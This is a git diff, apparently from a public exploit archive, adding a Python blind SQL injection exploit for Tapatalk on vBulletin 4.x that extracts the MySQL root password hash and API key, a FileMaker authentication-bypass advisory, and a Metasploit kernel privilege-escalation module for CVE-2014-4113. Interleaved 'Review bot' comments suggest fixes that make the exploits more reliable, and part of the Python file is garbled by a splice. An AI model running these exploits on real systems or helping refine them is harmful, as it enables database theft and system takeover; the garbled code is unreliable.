+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
\ No newline at end of file
diff --git a/platforms/php/webapps/35102.py b/platforms/php/webapps/35102.py
new file mode 100755
index 000000000..0df781175
--- /dev/null
+++ b/platforms/php/webapps/35102.py
@@ -0,0 +1,233 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+@author: tintinweb 0x721427D8
+'''
+import urllib2, urllib
+import xmlrpclib,re, urllib2,string,itertools,time
+from distutils.version import LooseVersion
+
+
+class Exploit(object):
+ def __init__(self, target, debug=0 ):
+ self.stopwatch_start=time.time()
+ self.target = target
+ self.path = target
+ self.debug=debug
+ if not self.target.endswith("mobiquo.php"):
+ self.path = self.detect_tapatalk()
+ if not self.path:
+ raise Exception("Could not detect tapatalk or version not supported!")
+ self.rpc_connect()
+ self.attack_func = self.attack_2
+
+ def detect_tapatalk(self):
+ # request page, check for tapatalk banner
+ handlers = [
+ urllib2.HTTPHandler(debuglevel=self.debug),
+ urllib2.HTTPSHandler(debuglevel=self.debug),
+
+ ]
+ ua = urllib2.build_opener(*handlers)
+ ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
+ data = ua.open(self.target).read()
+ if self.debug:
+ print data
+ if not "tapatalkDetect()" in data:
+ print "[xx] could not detect tapatalk. bye..."
+ return None
+
+ # extract tapatalk version
+ print "[ i] Taptalk detected ...
", + path = "".join(re.findall(r"^\s* + AND subscribethreadid.userid = 0"; + + : 1 UNION ALL OR FALSE + ''' + + query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) + query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" + + if self.debug: + print """ SELECT subscribethreadid + FROM subscribethread AS subscribethread + LEFT JOIN user AS user ON (user.userid=subscribethread.userid) + WHERE subscribethreadid = %s + AND subscribethread.userid = 0"""%query + + return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_" + + def attack_2(self, sqli, sleep=2): + ''' + SELECT subscribeforumid + FROM subscribeforum AS subscribeforum + LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) + WHERE subscribeforumid = + AND subscribeforum.userid = 0"; + + : 1 UNION ALL OR FALSE + ''' + + query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep) + query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0" + + if self.debug: + print """ SELECT subscribeforumid + FROM subscribeforum AS subscribeforum + LEFT JOIN user AS user ON (user.userid=subscribeforum.userid) + WHERE subscribeforumid = %s + AND subscribeforum.userid = 0"""%query + + return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_" + + def attack_blind(self,sqli,sleep=2): + return self.attack_func(sqli,sleep=sleep) + #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli) + + def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True): + ''' + provide = select -1 from user where user='debian-sys-maint' where + ''' + + + hit = False + # PHASE 1 - guess entry length + print "[ ] trying to guess length ..." 
+ for guess_length in xrange(maxlength+1):
+ q = query.replace("","length(%s)"%column).replace("","= %s"%guess_length)
+
+ self.stopwatch()
+ self.attack_blind(q, sleep)
+ duration = self.stopwatch()
+
+ print ".",
+
+ if duration >= sleep-sleep/8:
+ # HIT! - got length! => guess_length
+ hit = True
+ print ""
+ break
+
+ if not hit:
+ print "[ !!] unable to guess password length, check query!"
+ return None
+
+
+ print "[ *] LENGTH = %s"%guess_length
+
+ # PHASE 2 - guess password up to length
+ print "[ ] trying to guess value ..."
+ hits = 0
+ result = ""
+ for pos in xrange(guess_length):
+ # for each char pos in up to guessed length
+ for attempt in self.bruteforce(charset, 1):
+ # probe all chars in charset
+ #attempt = re.escape(attempt)
+ if attempt == "%%":
+ attempt= "\%"
+ #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
+ q = query.replace("",column).replace("","LIKE '%s%s%%' "%(result,attempt))
+
+ self.stopwatch()
+ self.attack_blind(q, sleep)
+ duration = self.stopwatch()
+
+ #print result,attempt," ",duration
+ print ".",
+ if duration >= sleep-sleep/8:
+ if case:
+ # case insensitive hit - recheck case: this is drastically reducing queries needed.
+ q = query.replace("",column).replace("","LIKE binary '%s%s%%' "%(result,attempt.lower()))
+ self.stopwatch()
+ self.attack_blind(q, sleep)
+ duration = self.stopwatch()
+ if duration >= sleep-sleep/8:
+ attempt = attempt.lower()
+ else:
+ attempt = attempt.upper()
+ # case sensitive - end
+
+
+
+ # HIT! - got length! => guess_length
+ hits += 1
+ print ""
+ print "[ +] HIT! - %s[%s].."%(result,attempt)
+ result += attempt
+ break
+
+ if not hits==guess_length:
+ print "[ !!] unable to guess password length, check query!"
+ return None
+
+ print "[ *] SUCCESS!: query: %s"%(query.replace("",column).replace("","='%s'"%result))
+ return result
+
+ def bruteforce(self, charset, maxlength):
+ return (''.join(candidate)
+ for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
+ for i in range(1, maxlength + 1)))
+
+ def stopwatch(self):
+ stop = time.time()
+ diff = stop - self.stopwatch_start
+ self.stopwatch_start=stop
+ return diff
+
+if __name__=="__main__":
+ #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
+ DEBUG = False
+ TARGET = "http://TARGET/vbb4/forum.php"
+ x = Exploit(TARGET,debug=DEBUG)
+
+ print "[ ] TAPATALK for vBulletin 4.x - SQLi"
+ print "[--] Target: %s"%TARGET
+ if DEBUG: print "[--] DEBUG-Mode!"
+
+ print "[ +] Attack - sqli"
+
+
+ query = u"-1 UNION SELECT 1%s"%unichr(0)
+ if DEBUG:
+ print u""" SELECT subscribeforumid
+ FROM subscribeforum AS subscribeforum
+ LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
+ WHERE subscribeforumid = %s
+ AND subscribeforum.userid = 0"""%query
+
+
+ print "[ *] guess mysql user/pass"
+ print x.attack_blind_guess("select -1 from mysql.user where user='root' and ",
+ column="password",
+ charset="*"+string.hexdigits,
+ maxlength=45) # usually 40 chars + 1 (*)
+
+ print "[ *] guess apikey"
+ print x.attack_blind_guess("select -1 from setting where varname='apikey' and ",
+ column='value',
+ charset=string.ascii_letters+string.digits,
+ maxlength=14,
+ )
+
+ print "-- done --"
\ No newline at end of file
diff --git a/platforms/windows/local/35077.txt b/platforms/windows/local/35077.txt
new file mode 100755
index 000000000..224c1adc5
--- /dev/null
+++ b/platforms/windows/local/35077.txt
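Review bot: The failure message after `if not hits==guess_length:` in `attack_blind_guess` is copy-pasted from the length phase and reports `unable to guess password length` when it is the value phase that failed; something like `print "[ !!] unable to guess value (%s of %s chars), check query!"%(hits,guess_length)` would tell the operator which phase to debug. The header imports `urllib2` twice and also `urllib` and `LooseVersion`, neither of which is used in the visible portion of the file; the middle of this hunk (from the `detect_tapatalk` regex through the start of `attack_1`) appears truncated in this rendering, so confirm against the full file before dropping them. The code is Python 2 only (`print` statements, `xrange`, `unichr`, `urllib2`) while the shebang is the version-neutral `#!/usr/bin/env python`; `#!/usr/bin/env python2` or a header comment stating the interpreter requirement would document that.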
@@ -0,0 +1,64 @@
+Filemaker Login Bypass and Privilege Escalation
+=======================================================================
+
+[ADVISORY INFORMATION]
+
+Title: Filemaker Login Bypass and Privilege Escalation
+Discovery date: 19/10/2014
+Release date: 19/10/2014
+Vendor Homepage: www.filemaker.com
+Version: Filemaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
+Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
+
+[VULNERABILITY INFORMATION]
+
+Class: Authentication Bypass and Privilege Escalation
+Category: Desktop Application
+Severity: High
+CVSS v2 Vector: 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C
+
+[AFFECTED PRODUCTS]
+
+This security vulnerability affects:
+
+ * FileMaker Pro 13.0v3 - FileMaker Pro Advanced 12.0v4
+
+[VULNERABILITY DETAILS]
+
+There is a obvious vulnerability of FileMaker that allow access to the local FM-based database file:
+On DBEngine dll, there is a function called MatchPasswordData:
+
+ ...
+ ...
+ ...
+ 5BB8D53A C68424 74020000 >MOV BYTE PTR SS:[ESP+274],0
+ 5BB8D542 FF15 D437D25B CALL DWORD PTR DS:[<&Support.??1PasswordHash@Draco@@QAE@XZ>] <-- Compute the password's hash.
+ 5BB8D548 8B8C24 6C020000 MOV ECX,DWORD PTR SS:[ESP+26C]
+ 5BB8D54F 5F POP EDI
+ 5BB8D550 5E POP ESI
+ 5BB8D551 8AC3 MOV AL,BL <-- if AL is 0 then you are not authenticated else if AL is 1 you are authenticated,
+ so simply by changing a single bit you are able to bypass the login,
+ also if your username is Admin, you can obtain a privilege escalation and full permissions on DB.
+ 5BB8D553 64:890D 00000000 MOV DWORD PTR FS:[0],ECX
+ 5BB8D55A 5B POP EBX
+ 5BB8D55B 8BE5 MOV ESP,EBP
+ 5BB8D55D 5D POP EBP
+ 5BB8D55E C2 0400 RETN 4
+ ...
+ ...
+ ...
+
+
+it doesn't matter if your desktop or mobile application is developed in a "secure manner", your confidential data on the database can be accessed.
+
+[DISCLOSURE TIME-LINE]
+
+ * 19/10/2014 - Public disclosure and simultaneously initial vendor contact.
+
+[DISCLAIMER]
+
+The author is not responsible for the misuse of the information provided in
+this security advisory. The advisory is a service to the professional security
+community. There are NO WARRANTIES with regard to this information. Any
+application or distribution of this information constitutes acceptance AS IS,
+at the user's own risk. This information is subject to change without notice.
\ No newline at end of file
diff --git a/platforms/windows/local/35101.rb b/platforms/windows/local/35101.rb
new file mode 100755
index 000000000..6762ba16d
--- /dev/null
+++ b/platforms/windows/local/35101.rb
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Msf::Post::File
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Process
+ include Msf::Post::Windows::FileInfo
+ include Msf::Post::Windows::ReflectiveDLLInjection
+
+ def initialize(info={})
+ super(update_info(info, {
+ 'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
+ 'Description' => %q{
+ This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
+ can be triggered through the use of TrackPopupMenu. Under special conditions, the
+ NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
+ code execution. This module has been tested successfully on Windows XP SP3, Windows
+ 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
+ 2008 R2 SP1 64 bits.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # vulnerability discovery and exploit in the wild
+ 'juan vazquez', # msf module (x86 target)
+ 'Spencer McIntyre' # msf module (x64 target)
+ ],
+ 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+ 'Platform' => 'win',
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Targets' =>
+ [
+ # Tested on (32 bits):
+ # * Windows XP SP3
+ # * Windows 2003 SP2
+ # * Windows 7 SP1
+ # * Windows 2008
+ [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+ # Tested on (64 bits):
+ # * Windows 7 SP1
+ # * Windows 2008 R2 SP1
+ [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 4096,
+ 'DisableNops' => true
+ },
+ 'References' =>
+ [
+ ['CVE', '2014-4113'],
+ ['OSVDB', '113167'],
+ ['BID', '70364'],
+ ['MSB', 'MS14-058'],
+ ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
+ ],
+ 'DisclosureDate' => 'Oct 14 2014',
+ 'DefaultTarget' => 0
+ }))
+ end
+
+ def check
+ os = sysinfo["OS"]
+
+ if os !~ /windows/i
+ return Exploit::CheckCode::Unknown
+ end
+
+ if sysinfo["Architecture"] =~ /(wow|x)64/i
+ arch = ARCH_X86_64
+ elsif sysinfo["Architecture"] =~ /x86/i
+ arch = ARCH_X86
+ end
+
+ file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+ major, minor, build, revision, branch = file_version(file_path)
+ vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+ # Neither target suports Windows 8 or 8.1
+ return Exploit::CheckCode::Safe if build == 9200
+ return Exploit::CheckCode::Safe if build == 9600
+
+ if arch == ARCH_X86
+ return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
+ else
+ return Exploit::CheckCode::Detected if build == 7601
+ end
+
+ return Exploit::CheckCode::Unknown
+ end
+
+ def exploit
+ if is_system?
+ fail_with(Exploit::Failure::None, 'Session is already elevated')
+ end
+
+ if check == Exploit::CheckCode::Safe
+ fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+ end
+
+ if sysinfo["Architecture"] =~ /wow64/i
+ fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+ elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
+ fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+ elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
+ fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+ end
+
+ print_status('Launching notepad to host the exploit...')
+ notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
+ begin
+ process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+ print_good("Process #{process.pid} launched.")
+ rescue Rex::Post::Meterpreter::RequestError
+ # Reader Sandbox won't allow to create a new process:
+ # stdapi_sys_process_execute: Operation failed: Access is denied.
+ print_status('Operation failed. Trying to elevate the current process...')
+ process = client.sys.process.open
+ end
+
+ print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+ if target.arch.first == ARCH_X86
+ dll_file_name = 'cve-2014-4113.x86.dll'
+ else
+ dll_file_name = 'cve-2014-4113.x64.dll'
+ end
+
+ library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
+ library_path = ::File.expand_path(library_path)
+
+ print_status("Injecting exploit into #{process.pid}...")
+ exploit_mem, offset = inject_dll_into_process(process, library_path)
+
+ print_status("Exploit injected. Injecting payload into #{process.pid}...")
+ payload_mem = inject_into_process(process, payload.encoded)
+
+ # invoke the exploit, passing in the address of the payload that
+ # we want invoked on successful exploitation.
+ print_status('Payload injected. Executing exploit...')
+ process.thread.create(exploit_mem + offset, payload_mem)
+
+ print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+ end
+
+end
\ No newline at end of file
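Review bot: In `check`, `arch` is left nil when `sysinfo["Architecture"]` matches neither `/(wow|x)64/i` nor `/x86/i`, and the following `if arch == ARCH_X86 ... else` then treats that unrecognised architecture as x64 and reports `Detected` on build 7601; add `return Exploit::CheckCode::Unknown if arch.nil?` before that branch. Relatedly, `exploit` aborts only when `check` returns `Safe`, so an `Unknown` result (any win32k.sys build outside the listed ones, or a nil `build` if `file_version` fails) still goes on to trigger a kernel NULL-pointer dereference on an untested build, where the likely outcome is a crash of the session host rather than a privileged payload; gating on `check == Exploit::CheckCode::Detected` would be the safer default. The failure constants are referenced in two forms (`Exploit::Failure::None` / `Exploit::Failure::NotVulnerable` versus `Failure::NoTarget`); pick one. The comment `# Neither target suports Windows 8 or 8.1` should read `supports`.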